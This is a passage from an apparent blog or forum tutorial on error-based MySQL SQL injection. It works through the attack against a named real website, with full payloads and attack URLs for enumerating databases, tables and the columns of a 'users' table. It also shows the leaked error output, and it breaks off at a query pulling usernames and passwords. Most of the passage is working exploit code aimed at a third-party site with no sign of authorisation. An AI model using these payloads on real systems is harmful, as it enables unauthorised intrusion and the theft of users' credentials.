<hr style="background-color: rgba(0, 0, 0, 0.2); font-family: 'lucida grande', tahoma, verdana, arial, sans-serif; font-size: 12px; line-height: 19.1875px; margin: 0px; padding: 0px;" />
<span style="background-color: rgba(0, 0, 0, 0.2); font-family: 'lucida grande', tahoma, verdana, arial, sans-serif; font-size: 12px; line-height: 19.1875px; margin: 0px; padding: 0px; text-decoration: underline;"><span style="margin: 0px; padding: 0px;"><span style="font-weight: bold; margin: 0px; padding: 0px;">Now that we've got the version, let's extract the database:</span></span></span><br style="background-color: rgba(0, 0, 0, 0.2); font-family: 'lucida grande', tahoma, verdana, arial, sans-serif; font-size: 12px; line-height: 19.1875px; margin: 0px; padding: 0px;" /><br style="background-color: rgba(0, 0, 0, 0.2); font-family: 'lucida grande', tahoma, verdana, arial, sans-serif; font-size: 12px; line-height: 19.1875px; margin: 0px; padding: 0px;" /><span style="background-color: rgba(0, 0, 0, 0.2); font-family: 'lucida grande', tahoma, verdana, arial, sans-serif; font-size: 12px; line-height: 19.1875px;">Query used:</span><br />
<div class="codeblock" style="background-color: rgba(0, 0, 0, 0.2); font-family: 'lucida grande', tahoma, verdana, arial, sans-serif; font-size: 12px; line-height: 19.1875px; margin: 0px; padding: 0px;">
<div class="title" style="margin: 0px; padding: 0px;">
Code:</div>
<div class="body" dir="ltr" style="margin: 0px; padding: 0px;">
<code style="border-color: rgba(255, 255, 255, 0.027451); border-style: solid; border-width: 2px 2px 2px 20px; display: block; line-height: 1.6em; margin: 0px auto; padding: 2px 15px;">+and+(select+1+from+(select+count(*)+from+(select+1+union+select+2+union+select+ 3)x+group+by+concat(mid((select+concat_ws(0x7e,group_concat(schema_name),0x7e)+f rom+information_schema.schemata limit+0,1),1,25),floor(rand(0)*2)))a)-- x</code></div>
</div>
<br style="background-color: rgba(0, 0, 0, 0.2); font-family: 'lucida grande', tahoma, verdana, arial, sans-serif; font-size: 12px; line-height: 19.1875px; margin: 0px; padding: 0px;" /><span style="background-color: rgba(0, 0, 0, 0.2); font-family: 'lucida grande', tahoma, verdana, arial, sans-serif; font-size: 12px; line-height: 19.1875px;">URL will look like this:</span><br />
<div class="codeblock" style="background-color: rgba(0, 0, 0, 0.2); font-family: 'lucida grande', tahoma, verdana, arial, sans-serif; font-size: 12px; line-height: 19.1875px; margin: 0px; padding: 0px;">
<div class="title" style="margin: 0px; padding: 0px;">
Code:</div>
<div class="body" dir="ltr" style="margin: 0px; padding: 0px;">
<code style="border-color: rgba(255, 255, 255, 0.027451); border-style: solid; border-width: 2px 2px 2px 20px; display: block; line-height: 1.6em; margin: 0px auto; padding: 2px 15px;">http://www.seenpm.org/new/index.php?id=151+and+(select+1+from+(select+count(*)+from+(select+1+union+select +2+union+select+3)x+group+by+concat(mid((select+concat_ws(0x7e,group_concat(sche ma_name),0x7e)+from+information_schema.schemata limit+0,1),1,25),floor(rand(0)*2)))a)-- x</code></div>
</div>
<br style="background-color: rgba(0, 0, 0, 0.2); font-family: 'lucida grande', tahoma, verdana, arial, sans-serif; font-size: 12px; line-height: 19.1875px; margin: 0px; padding: 0px;" /><span style="background-color: rgba(0, 0, 0, 0.2); font-family: 'lucida grande', tahoma, verdana, arial, sans-serif; font-size: 12px; line-height: 19.1875px;">Results:</span><br />
<div class="codeblock" style="background-color: rgba(0, 0, 0, 0.2); font-family: 'lucida grande', tahoma, verdana, arial, sans-serif; font-size: 12px; line-height: 19.1875px; margin: 0px; padding: 0px;">
<div class="title" style="margin: 0px; padding: 0px;">
Code:</div>
<div class="body" dir="ltr" style="margin: 0px; padding: 0px;">
<code style="border-color: rgba(255, 255, 255, 0.027451); border-style: solid; border-width: 2px 2px 2px 20px; display: block; line-height: 1.6em; margin: 0px auto; padding: 2px 15px;">Duplicate entry 'information_schema,seenpm_2007~~1' for key 'group_key'</code></div>
</div>
<br style="background-color: rgba(0, 0, 0, 0.2); font-family: 'lucida grande', tahoma, verdana, arial, sans-serif; font-size: 12px; line-height: 19.1875px; margin: 0px; padding: 0px;" /><span style="background-color: rgba(0, 0, 0, 0.2); font-family: 'lucida grande', tahoma, verdana, arial, sans-serif; font-size: 12px; line-height: 19.1875px;">Note: Notice the limit </span><span style="background-color: rgba(0, 0, 0, 0.2); font-family: 'lucida grande', tahoma, verdana, arial, sans-serif; font-size: 12px; line-height: 19.1875px; margin: 0px; padding: 0px;">0,1),1,150)</span><br style="background-color: rgba(0, 0, 0, 0.2); font-family: 'lucida grande', tahoma, verdana, arial, sans-serif; font-size: 12px; line-height: 19.1875px; margin: 0px; padding: 0px;" /><span style="background-color: rgba(0, 0, 0, 0.2); font-family: 'lucida grande', tahoma, verdana, arial, sans-serif; font-size: 12px; line-height: 19.1875px;">This is the part where I raised the ascii from 25 to 150, just in case there would have been more database</span><br style="background-color: rgba(0, 0, 0, 0.2); font-family: 'lucida grande', tahoma, verdana, arial, sans-serif; font-size: 12px; line-height: 19.1875px; margin: 0px; padding: 0px;" /><span style="background-color: rgba(0, 0, 0, 0.2); font-family: 'lucida grande', tahoma, verdana, arial, sans-serif; font-size: 12px; line-height: 19.1875px;">I'll explain more about the mid() function in the next step</span><br style="background-color: rgba(0, 0, 0, 0.2); font-family: 'lucida grande', tahoma, verdana, arial, sans-serif; font-size: 12px; line-height: 19.1875px; margin: 0px; padding: 0px;" /><br style="background-color: rgba(0, 0, 0, 0.2); font-family: 'lucida grande', tahoma, verdana, arial, sans-serif; font-size: 12px; line-height: 19.1875px; margin: 0px; padding: 0px;" /><span style="background-color: rgba(0, 0, 0, 0.2); font-family: 'lucida grande', tahoma, verdana, arial, sans-serif; font-size: 12px; line-height: 19.1875px;">Screenshot: </span><br />
<div style="background-color: rgba(0, 0, 0, 0.2); font-family: 'lucida grande', tahoma, verdana, arial, sans-serif; font-size: 12px; line-height: 19.1875px; margin: 0px; padding: 0px;">
<div class="spoiler_header" style="margin: 0px; padding: 0px;">
Spoiler <a href="http://www.blogger.com/blogger.g?blogID=1838743374043175243" style="margin: 0px; padding: 0px; text-decoration: none;">(Click to Hide)</a></div>
<div class="spoiler_body" style="margin: 0px; padding: 0px;">
<img alt="[Image: QxgVN.png]" border="0" height="440" src="http://i.imgur.com/QxgVN.png" style="background-color: #111111; background-position: initial initial; background-repeat: initial initial; border: 1px solid rgb(34, 34, 34); margin: 0px; padding: 5px;" width="640" /></div>
</div>
<br style="background-color: rgba(0, 0, 0, 0.2); font-family: 'lucida grande', tahoma, verdana, arial, sans-serif; font-size: 12px; line-height: 19.1875px; margin: 0px; padding: 0px;" /><span style="background-color: rgba(0, 0, 0, 0.2); font-family: 'lucida grande', tahoma, verdana, arial, sans-serif; font-size: 12px; line-height: 19.1875px;">We have the database and version so far</span><br />
<hr style="background-color: rgba(0, 0, 0, 0.2); font-family: 'lucida grande', tahoma, verdana, arial, sans-serif; font-size: 12px; line-height: 19.1875px; margin: 0px; padding: 0px;" />
<span style="background-color: rgba(0, 0, 0, 0.2); font-family: 'lucida grande', tahoma, verdana, arial, sans-serif; font-size: 12px; line-height: 19.1875px; margin: 0px; padding: 0px;"><span style="margin: 0px; padding: 0px; text-decoration: underline;"><span style="font-weight: bold; margin: 0px; padding: 0px;">Now for the tables in their current database</span></span></span><br style="background-color: rgba(0, 0, 0, 0.2); font-family: 'lucida grande', tahoma, verdana, arial, sans-serif; font-size: 12px; line-height: 19.1875px; margin: 0px; padding: 0px;" /><br style="background-color: rgba(0, 0, 0, 0.2); font-family: 'lucida grande', tahoma, verdana, arial, sans-serif; font-size: 12px; line-height: 19.1875px; margin: 0px; padding: 0px;" /><span style="background-color: rgba(0, 0, 0, 0.2); font-family: 'lucida grande', tahoma, verdana, arial, sans-serif; font-size: 12px; line-height: 19.1875px;">Query:</span><br />
<div class="codeblock" style="background-color: rgba(0, 0, 0, 0.2); font-family: 'lucida grande', tahoma, verdana, arial, sans-serif; font-size: 12px; line-height: 19.1875px; margin: 0px; padding: 0px;">
<div class="title" style="margin: 0px; padding: 0px;">
Code:</div>
<div class="body" dir="ltr" style="margin: 0px; padding: 0px;">
<code style="border-color: rgba(255, 255, 255, 0.027451); border-style: solid; border-width: 2px 2px 2px 20px; display: block; line-height: 1.6em; margin: 0px auto; padding: 2px 15px;">+and+(select+1+from+(select+count(*)+from+(select+1+union+select+2+union+select+ 3)x+group+by+concat(mid((select+concat_ws(0x7e,group_concat(table_name),0x7e)+fr om+information_schema.tables where table_schema=database() limit+0,1),1,25),floor(rand(0)*2)))a)-- x</code></div>
</div>
<br style="background-color: rgba(0, 0, 0, 0.2); font-family: 'lucida grande', tahoma, verdana, arial, sans-serif; font-size: 12px; line-height: 19.1875px; margin: 0px; padding: 0px;" /><span style="background-color: rgba(0, 0, 0, 0.2); font-family: 'lucida grande', tahoma, verdana, arial, sans-serif; font-size: 12px; line-height: 19.1875px;">URL:</span><br />
<div class="codeblock" style="background-color: rgba(0, 0, 0, 0.2); font-family: 'lucida grande', tahoma, verdana, arial, sans-serif; font-size: 12px; line-height: 19.1875px; margin: 0px; padding: 0px;">
<div class="title" style="margin: 0px; padding: 0px;">
Code:</div>
<div class="body" dir="ltr" style="margin: 0px; padding: 0px;">
<code style="border-color: rgba(255, 255, 255, 0.027451); border-style: solid; border-width: 2px 2px 2px 20px; display: block; line-height: 1.6em; margin: 0px auto; padding: 2px 15px;">http://www.seenpm.org/new/index.php?id=151+and+(select+1+from+(select+count(*)+from+(select+1+union+select +2+union+select+3)x+group+by+concat(mid((select+concat_ws(0x7e,group_concat(tabl e_name),0x7e)+from+information_schema.tables where table_schema=database() limit+0,1),1,25),floor(rand(0)*2)))a)-- x</code></div>
</div>
<br style="background-color: rgba(0, 0, 0, 0.2); font-family: 'lucida grande', tahoma, verdana, arial, sans-serif; font-size: 12px; line-height: 19.1875px; margin: 0px; padding: 0px;" /><span style="background-color: rgba(0, 0, 0, 0.2); font-family: 'lucida grande', tahoma, verdana, arial, sans-serif; font-size: 12px; line-height: 19.1875px;">Results:</span><br />
<div class="codeblock" style="background-color: rgba(0, 0, 0, 0.2); font-family: 'lucida grande', tahoma, verdana, arial, sans-serif; font-size: 12px; line-height: 19.1875px; margin: 0px; padding: 0px;">
<div class="title" style="margin: 0px; padding: 0px;">
Code:</div>
<div class="body" dir="ltr" style="margin: 0px; padding: 0px;">
<code style="border-color: rgba(255, 255, 255, 0.027451); border-style: solid; border-width: 2px 2px 2px 20px; display: block; line-height: 1.6em; margin: 0px auto; padding: 2px 15px;">'links,members,menu,menu_s1' for key 'group_key'</code></div>
</div>
<br style="background-color: rgba(0, 0, 0, 0.2); font-family: 'lucida grande', tahoma, verdana, arial, sans-serif; font-size: 12px; line-height: 19.1875px; margin: 0px; padding: 0px;" /><span style="background-color: rgba(0, 0, 0, 0.2); font-family: 'lucida grande', tahoma, verdana, arial, sans-serif; font-size: 12px; line-height: 19.1875px;">Now read this carefully, notice how the tables aren't completely shown.</span><br style="background-color: rgba(0, 0, 0, 0.2); font-family: 'lucida grande', tahoma, verdana, arial, sans-serif; font-size: 12px; line-height: 19.1875px; margin: 0px; padding: 0px;" /><span style="background-color: rgba(0, 0, 0, 0.2); font-family: 'lucida grande', tahoma, verdana, arial, sans-serif; font-size: 12px; line-height: 19.1875px;">Only about half of em are shown. This is because of the mid() function we're using.</span><br style="background-color: rgba(0, 0, 0, 0.2); font-family: 'lucida grande', tahoma, verdana, arial, sans-serif; font-size: 12px; line-height: 19.1875px; margin: 0px; padding: 0px;" /><br style="background-color: rgba(0, 0, 0, 0.2); font-family: 'lucida grande', tahoma, verdana, arial, sans-serif; font-size: 12px; line-height: 19.1875px; margin: 0px; padding: 0px;" /><span style="background-color: rgba(0, 0, 0, 0.2); font-family: 'lucida grande', tahoma, verdana, arial, sans-serif; font-size: 12px; font-style: italic; line-height: 19.1875px; margin: 0px; padding: 0px;"><span style="margin: 0px; padding: 0px; text-decoration: underline;">Leave the limit 0,1 function and don't touch it</span></span><br style="background-color: rgba(0, 0, 0, 0.2); font-family: 'lucida grande', tahoma, verdana, arial, sans-serif; font-size: 12px; line-height: 19.1875px; margin: 0px; padding: 0px;" /><br style="background-color: rgba(0, 0, 0, 0.2); font-family: 'lucida grande', tahoma, verdana, arial, sans-serif; font-size: 12px; line-height: 19.1875px; margin: 0px; padding: 0px;" /><span style="background-color: rgba(0, 0, 0, 0.2); font-family: 'lucida grande', tahoma, verdana, arial, sans-serif; font-size: 12px; line-height: 19.1875px;">What you need to alter now is the integers of the mid() function</span><br style="background-color: rgba(0, 0, 0, 0.2); font-family: 'lucida grande', tahoma, verdana, arial, sans-serif; font-size: 12px; line-height: 19.1875px; margin: 0px; padding: 0px;" /><span style="background-color: rgba(0, 0, 0, 0.2); font-family: 'lucida grande', tahoma, verdana, arial, sans-serif; font-size: 12px; line-height: 19.1875px;">i.e (mid((select+concat_ws(0x7e,group_concat(table_name),0x7e)+from+information_sche ma.tables where table_schema=database() limit+0,1),</span><span style="background-color: rgba(0, 0, 0, 0.2); font-family: 'lucida grande', tahoma, verdana, arial, sans-serif; font-size: 12px; line-height: 19.1875px; margin: 0px; padding: 0px;">1,25</span><span style="background-color: rgba(0, 0, 0, 0.2); font-family: 'lucida grande', tahoma, verdana, arial, sans-serif; font-size: 12px; line-height: 19.1875px;">)</span><br style="background-color: rgba(0, 0, 0, 0.2); font-family: 'lucida grande', tahoma, verdana, arial, sans-serif; font-size: 12px; line-height: 19.1875px; margin: 0px; padding: 0px;" /><br style="background-color: rgba(0, 0, 0, 0.2); font-family: 'lucida grande', tahoma, verdana, arial, sans-serif; font-size: 12px; line-height: 19.1875px; margin: 0px; padding: 0px;" /><span style="background-color: rgba(0, 0, 0, 0.2); font-family: 'lucida grande', tahoma, verdana, arial, sans-serif; font-size: 12px; line-height: 19.1875px;">Yes, that's right. Notice 1,25</span><br style="background-color: rgba(0, 0, 0, 0.2); font-family: 'lucida grande', tahoma, verdana, arial, sans-serif; font-size: 12px; line-height: 19.1875px; margin: 0px; padding: 0px;" /><span style="background-color: rgba(0, 0, 0, 0.2); font-family: 'lucida grande', tahoma, verdana, arial, sans-serif; font-size: 12px; line-height: 19.1875px;">25 can also be altered, however it's a moderate value, so leave it like that</span><br style="background-color: rgba(0, 0, 0, 0.2); font-family: 'lucida grande', tahoma, verdana, arial, sans-serif; font-size: 12px; line-height: 19.1875px; margin: 0px; padding: 0px;" /><span style="background-color: rgba(0, 0, 0, 0.2); font-family: 'lucida grande', tahoma, verdana, arial, sans-serif; font-size: 12px; line-height: 19.1875px;">Now, the number "</span><span style="background-color: rgba(0, 0, 0, 0.2); font-family: 'lucida grande', tahoma, verdana, arial, sans-serif; font-size: 12px; line-height: 19.1875px; margin: 0px; padding: 0px;">1</span><span style="background-color: rgba(0, 0, 0, 0.2); font-family: 'lucida grande', tahoma, verdana, arial, sans-serif; font-size: 12px; line-height: 19.1875px;">" shows the tables as soon as it's being altered.</span><br style="background-color: rgba(0, 0, 0, 0.2); font-family: 'lucida grande', tahoma, verdana, arial, sans-serif; font-size: 12px; line-height: 19.1875px; margin: 0px; padding: 0px;" /><span style="background-color: rgba(0, 0, 0, 0.2); font-family: 'lucida grande', tahoma, verdana, arial, sans-serif; font-size: 12px; line-height: 19.1875px;">Incrementing is what's being needed here</span><br style="background-color: rgba(0, 0, 0, 0.2); font-family: 'lucida grande', tahoma, verdana, arial, sans-serif; font-size: 12px; line-height: 19.1875px; margin: 0px; padding: 0px;" /><span style="background-color: rgba(0, 0, 0, 0.2); font-family: 'lucida grande', tahoma, verdana, arial, sans-serif; font-size: 12px; line-height: 19.1875px;">Lets just say, </span><span style="background-color: rgba(0, 0, 0, 0.2); font-family: 'lucida grande', tahoma, verdana, arial, sans-serif; font-size: 12px; line-height: 19.1875px; margin: 0px; padding: 0px;">15,25</span><br style="background-color: rgba(0, 0, 0, 0.2); font-family: 'lucida grande', tahoma, verdana, arial, sans-serif; font-size: 12px; line-height: 19.1875px; margin: 0px; padding: 0px;" /><span style="background-color: rgba(0, 0, 0, 0.2); font-family: 'lucida grande', tahoma, verdana, arial, sans-serif; font-size: 12px; line-height: 19.1875px;">It'll display the rest of the other tables</span><br style="background-color: rgba(0, 0, 0, 0.2); font-family: 'lucida grande', tahoma, verdana, arial, sans-serif; font-size: 12px; line-height: 19.1875px; margin: 0px; padding: 0px;" /><br style="background-color: rgba(0, 0, 0, 0.2); font-family: 'lucida grande', tahoma, verdana, arial, sans-serif; font-size: 12px; line-height: 19.1875px; margin: 0px; padding: 0px;" /><span style="background-color: rgba(0, 0, 0, 0.2); font-family: 'lucida grande', tahoma, verdana, arial, sans-serif; font-size: 12px; line-height: 19.1875px;">I've done a bit of a reckon on the site and found out that the '</span><span style="background-color: rgba(0, 0, 0, 0.2); font-family: 'lucida grande', tahoma, verdana, arial, sans-serif; font-size: 12px; line-height: 19.1875px; margin: 0px; padding: 0px;">users</span><span style="background-color: rgba(0, 0, 0, 0.2); font-family: 'lucida grande', tahoma, verdana, arial, sans-serif; font-size: 12px; line-height: 19.1875px;">' table is located at </span><span style="background-color: rgba(0, 0, 0, 0.2); font-family: 'lucida grande', tahoma, verdana, arial, sans-serif; font-size: 12px; line-height: 19.1875px; margin: 0px; padding: 0px;">58,25</span><br style="background-color: rgba(0, 0, 0, 0.2); font-family: 'lucida grande', tahoma, verdana, arial, sans-serif; font-size: 12px; line-height: 19.1875px; margin: 0px; padding: 0px;" /><br style="background-color: rgba(0, 0, 0, 0.2); font-family: 'lucida grande', tahoma, verdana, arial, sans-serif; font-size: 12px; line-height: 19.1875px; margin: 0px; padding: 0px;" /><span style="background-color: rgba(0, 0, 0, 0.2); font-family: 'lucida grande', tahoma, verdana, arial, sans-serif; font-size: 12px; line-height: 19.1875px;">So the query with the URL will look like:</span><br />
<div class="codeblock" style="background-color: rgba(0, 0, 0, 0.2); font-family: 'lucida grande', tahoma, verdana, arial, sans-serif; font-size: 12px; line-height: 19.1875px; margin: 0px; padding: 0px;">
<div class="title" style="margin: 0px; padding: 0px;">
Code:</div>
<div class="body" dir="ltr" style="margin: 0px; padding: 0px;">
<code style="border-color: rgba(255, 255, 255, 0.027451); border-style: solid; border-width: 2px 2px 2px 20px; display: block; line-height: 1.6em; margin: 0px auto; padding: 2px 15px;">http://www.seenpm.org/new/index.php?id=151+and+(select+1+from+(select+count(*)+from+(select+1+union+select +2+union+select+3)x+group+by+concat(mid((select+concat_ws(0x7e,group_concat(tabl e_name),0x7e)+from+information_schema.tables where table_schema=database() limit+0,1),58,25),floor(rand(0)*2)))a)-- x</code></div>
</div>
<br style="background-color: rgba(0, 0, 0, 0.2); font-family: 'lucida grande', tahoma, verdana, arial, sans-serif; font-size: 12px; line-height: 19.1875px; margin: 0px; padding: 0px;" /><span style="background-color: rgba(0, 0, 0, 0.2); font-family: 'lucida grande', tahoma, verdana, arial, sans-serif; font-size: 12px; line-height: 19.1875px;">Results:</span><br />
<div class="codeblock" style="background-color: rgba(0, 0, 0, 0.2); font-family: 'lucida grande', tahoma, verdana, arial, sans-serif; font-size: 12px; line-height: 19.1875px; margin: 0px; padding: 0px;">
<div class="title" style="margin: 0px; padding: 0px;">
Code:</div>
<div class="body" dir="ltr" style="margin: 0px; padding: 0px;">
<code style="border-color: rgba(255, 255, 255, 0.027451); border-style: solid; border-width: 2px 2px 2px 20px; display: block; line-height: 1.6em; margin: 0px auto; padding: 2px 15px;">Duplicate entry 'ers,u_page,u_par,users~~1' for key 'group_key'</code></div>
</div>
<br style="background-color: rgba(0, 0, 0, 0.2); font-family: 'lucida grande', tahoma, verdana, arial, sans-serif; font-size: 12px; line-height: 19.1875px; margin: 0px; padding: 0px;" /><span style="background-color: rgba(0, 0, 0, 0.2); font-family: 'lucida grande', tahoma, verdana, arial, sans-serif; font-size: 12px; line-height: 19.1875px;">Screenshot:</span><br />
<div style="background-color: rgba(0, 0, 0, 0.2); font-family: 'lucida grande', tahoma, verdana, arial, sans-serif; font-size: 12px; line-height: 19.1875px; margin: 0px; padding: 0px;">
<div class="spoiler_header" style="margin: 0px; padding: 0px;">
Spoiler <a href="http://www.blogger.com/blogger.g?blogID=1838743374043175243" style="margin: 0px; padding: 0px; text-decoration: none;">(Click to Hide)</a></div>
<div class="spoiler_body" style="margin: 0px; padding: 0px;">
<img alt="[Image: AVmxf.png]" border="0" height="516" src="http://i.imgur.com/AVmxf.png" style="background-color: #111111; background-position: initial initial; background-repeat: initial initial; border: 1px solid rgb(34, 34, 34); margin: 0px; padding: 5px;" width="640" /></div>
</div>
<hr style="background-color: rgba(0, 0, 0, 0.2); font-family: 'lucida grande', tahoma, verdana, arial, sans-serif; font-size: 12px; line-height: 19.1875px; margin: 0px; padding: 0px;" />
<span style="background-color: rgba(0, 0, 0, 0.2); font-family: 'lucida grande', tahoma, verdana, arial, sans-serif; font-size: 12px; line-height: 19.1875px; margin: 0px; padding: 0px;"><span style="margin: 0px; padding: 0px; text-decoration: underline;"><span style="font-weight: bold; margin: 0px; padding: 0px;">Now for the columns in the specified table i.e users</span></span></span><br style="background-color: rgba(0, 0, 0, 0.2); font-family: 'lucida grande', tahoma, verdana, arial, sans-serif; font-size: 12px; line-height: 19.1875px; margin: 0px; padding: 0px;" /><br style="background-color: rgba(0, 0, 0, 0.2); font-family: 'lucida grande', tahoma, verdana, arial, sans-serif; font-size: 12px; line-height: 19.1875px; margin: 0px; padding: 0px;" /><span style="background-color: rgba(0, 0, 0, 0.2); font-family: 'lucida grande', tahoma, verdana, arial, sans-serif; font-size: 12px; line-height: 19.1875px;">Query:</span><br />
<div class="codeblock" style="background-color: rgba(0, 0, 0, 0.2); font-family: 'lucida grande', tahoma, verdana, arial, sans-serif; font-size: 12px; line-height: 19.1875px; margin: 0px; padding: 0px;">
<div class="title" style="margin: 0px; padding: 0px;">
Code:</div>
<div class="body" dir="ltr" style="margin: 0px; padding: 0px;">
<code style="border-color: rgba(255, 255, 255, 0.027451); border-style: solid; border-width: 2px 2px 2px 20px; display: block; line-height: 1.6em; margin: 0px auto; padding: 2px 15px;">+and+(select+1+from+(select+count(*)+from+(select+1+union+select+2+union+select+ 3)x+group+by+concat(mid((select+concat_ws(0x7e,group_concat(column_name),0x7e)+f rom+information_schema.columns where table_name=0xHex_Table limit+0,1),1,25),floor(rand(0)*2)))a)-- x</code></div>
</div>
<br style="background-color: rgba(0, 0, 0, 0.2); font-family: 'lucida grande', tahoma, verdana, arial, sans-serif; font-size: 12px; line-height: 19.1875px; margin: 0px; padding: 0px;" /><span style="background-color: rgba(0, 0, 0, 0.2); font-family: 'lucida grande', tahoma, verdana, arial, sans-serif; font-size: 12px; line-height: 19.1875px;">Notice you have to convert the current table to Hex.</span><br style="background-color: rgba(0, 0, 0, 0.2); font-family: 'lucida grande', tahoma, verdana, arial, sans-serif; font-size: 12px; line-height: 19.1875px; margin: 0px; padding: 0px;" /><span style="background-color: rgba(0, 0, 0, 0.2); font-family: 'lucida grande', tahoma, verdana, arial, sans-serif; font-size: 12px; line-height: 19.1875px;">To do that, you can go to </span><a href="http://www.swingnote.com/tools/texttohex.php" style="background-color: rgba(0, 0, 0, 0.2); font-family: 'lucida grande', tahoma, verdana, arial, sans-serif; font-size: 12px; line-height: 19.1875px; margin: 0px; padding: 0px; text-decoration: none;" target="_blank">http://www.swingnote.com/tools/texttohex.php</a><br style="background-color: rgba(0, 0, 0, 0.2); font-family: 'lucida grande', tahoma, verdana, arial, sans-serif; font-size: 12px; line-height: 19.1875px; margin: 0px; padding: 0px;" /><br style="background-color: rgba(0, 0, 0, 0.2); font-family: 'lucida grande', tahoma, verdana, arial, sans-serif; font-size: 12px; line-height: 19.1875px; margin: 0px; padding: 0px;" /><span style="background-color: rgba(0, 0, 0, 0.2); font-family: 'lucida grande', tahoma, verdana, arial, sans-serif; font-size: 12px; line-height: 19.1875px;">URL:</span><br />
<div class="codeblock" style="background-color: rgba(0, 0, 0, 0.2); font-family: 'lucida grande', tahoma, verdana, arial, sans-serif; font-size: 12px; line-height: 19.1875px; margin: 0px; padding: 0px;">
<div class="title" style="margin: 0px; padding: 0px;">
Code:</div>
<div class="body" dir="ltr" style="margin: 0px; padding: 0px;">
<code style="border-color: rgba(255, 255, 255, 0.027451); border-style: solid; border-width: 2px 2px 2px 20px; display: block; line-height: 1.6em; margin: 0px auto; padding: 2px 15px;">http://www.seenpm.org/new/index.php?id=151+and+(select+1+from+(select+count(*)+from+(select+1+union+select +2+union+select+3)x+group+by+concat(mid((select+concat_ws(0x7e,group_concat(colu mn_name),0x7e)+from+information_schema.columns where table_name=0x7573657273 limit+0,1),1,25),floor(rand(0)*2)))a)-- x</code></div>
</div>
<br style="background-color: rgba(0, 0, 0, 0.2); font-family: 'lucida grande', tahoma, verdana, arial, sans-serif; font-size: 12px; line-height: 19.1875px; margin: 0px; padding: 0px;" /><span style="background-color: rgba(0, 0, 0, 0.2); font-family: 'lucida grande', tahoma, verdana, arial, sans-serif; font-size: 12px; line-height: 19.1875px;">Now notice the mid() function</span><br style="background-color: rgba(0, 0, 0, 0.2); font-family: 'lucida grande', tahoma, verdana, arial, sans-serif; font-size: 12px; line-height: 19.1875px; margin: 0px; padding: 0px;" /><span style="background-color: rgba(0, 0, 0, 0.2); font-family: 'lucida grande', tahoma, verdana, arial, sans-serif; font-size: 12px; line-height: 19.1875px;">I've incremented from 1,25 to 4,25</span><br style="background-color: rgba(0, 0, 0, 0.2); font-family: 'lucida grande', tahoma, verdana, arial, sans-serif; font-size: 12px; line-height: 19.1875px; margin: 0px; padding: 0px;" /><br style="background-color: rgba(0, 0, 0, 0.2); font-family: 'lucida grande', tahoma, verdana, arial, sans-serif; font-size: 12px; line-height: 19.1875px; margin: 0px; padding: 0px;" /><span style="background-color: rgba(0, 0, 0, 0.2); font-family: 'lucida grande', tahoma, verdana, arial, sans-serif; font-size: 12px; line-height: 19.1875px;">Result:</span><br />
<div class="codeblock" style="background-color: rgba(0, 0, 0, 0.2); font-family: 'lucida grande', tahoma, verdana, arial, sans-serif; font-size: 12px; line-height: 19.1875px; margin: 0px; padding: 0px;">
<div class="title" style="margin: 0px; padding: 0px;">
Code:</div>
<div class="body" dir="ltr" style="margin: 0px; padding: 0px;">
<code style="border-color: rgba(255, 255, 255, 0.027451); border-style: solid; border-width: 2px 2px 2px 20px; display: block; line-height: 1.6em; margin: 0px auto; padding: 2px 15px;">'username,password,email,n1' for key 'group_key'</code></div>
</div>
<br style="background-color: rgba(0, 0, 0, 0.2); font-family: 'lucida grande', tahoma, verdana, arial, sans-serif; font-size: 12px; line-height: 19.1875px; margin: 0px; padding: 0px;" /><span style="background-color: rgba(0, 0, 0, 0.2); font-family: 'lucida grande', tahoma, verdana, arial, sans-serif; font-size: 12px; line-height: 19.1875px;">Screenshot: </span><br />
<div style="background-color: rgba(0, 0, 0, 0.2); font-family: 'lucida grande', tahoma, verdana, arial, sans-serif; font-size: 12px; line-height: 19.1875px; margin: 0px; padding: 0px;">
<div class="spoiler_header" style="margin: 0px; padding: 0px;">
Spoiler <a href="http://www.blogger.com/blogger.g?blogID=1838743374043175243" style="margin: 0px; padding: 0px; text-decoration: none;">(Click to Hide)</a></div>
<div class="spoiler_body" style="margin: 0px; padding: 0px;">
<img alt="[Image: oOnBR.png]" border="0" height="425" src="http://i.imgur.com/oOnBR.png" style="background-color: #111111; background-position: initial initial; background-repeat: initial initial; border: 1px solid rgb(34, 34, 34); margin: 0px; padding: 5px;" width="640" /></div>
</div>
<hr style="background-color: rgba(0, 0, 0, 0.2); font-family: 'lucida grande', tahoma, verdana, arial, sans-serif; font-size: 12px; line-height: 19.1875px; margin: 0px; padding: 0px;" />
<br style="background-color: rgba(0, 0, 0, 0.2); font-family: 'lucida grande', tahoma, verdana, arial, sans-serif; font-size: 12px; line-height: 19.1875px; margin: 0px; padding: 0px;" /><span style="background-color: rgba(0, 0, 0, 0.2); font-family: 'lucida grande', tahoma, verdana, arial, sans-serif; font-size: 12px; line-height: 19.1875px; margin: 0px; padding: 0px; text-decoration: underline;"><span style="font-weight: bold; margin: 0px; padding: 0px;"><span style="margin: 0px; padding: 0px;">Now to extract the data from the desired columns</span></span></span><br style="background-color: rgba(0, 0, 0, 0.2); font-family: 'lucida grande', tahoma, verdana, arial, sans-serif; font-size: 12px; line-height: 19.1875px; margin: 0px; padding: 0px;" /><span style="background-color: rgba(0, 0, 0, 0.2); font-family: 'lucida grande', tahoma, verdana, arial, sans-serif; font-size: 12px; line-height: 19.1875px;">Columns we have so far: "username", "password"</span><br style="background-color: rgba(0, 0, 0, 0.2); font-family: 'lucida grande', tahoma, verdana, arial, sans-serif; font-size: 12px; line-height: 19.1875px; margin: 0px; padding: 0px;" /><br style="background-color: rgba(0, 0, 0, 0.2); font-family: 'lucida grande', tahoma, verdana, arial, sans-serif; font-size: 12px; line-height: 19.1875px; margin: 0px; padding: 0px;" /><span style="background-color: rgba(0, 0, 0, 0.2); font-family: 'lucida grande', tahoma, verdana, arial, sans-serif; font-size: 12px; line-height: 19.1875px;">Query:</span><br />
<div class="codeblock" style="background-color: rgba(0, 0, 0, 0.2); font-family: 'lucida grande', tahoma, verdana, arial, sans-serif; font-size: 12px; line-height: 19.1875px; margin: 0px; padding: 0px;">
<div class="title" style="margin: 0px; padding: 0px;">
Code:</div>
<div class="body" dir="ltr" style="margin: 0px; padding: 0px;">
<code style="border-color: rgba(255, 255, 255, 0.027451); border-style: solid; border-width: 2px 2px 2px 20px; display: block; line-height: 1.6em; margin: 0px auto; padding: 2px 15px;">+and+(select+1+from+(select+count(*)+from+(select+1+union+select+2+union+select+ 3)x+group+by+concat(mid((select+concat_ws(0x7e,group_concat(username,0x3a,passwo rd),0x7e)+from+users limit+0,1),1,25),floor(rand(0)*2)))a)-- x</code></div>
</div>
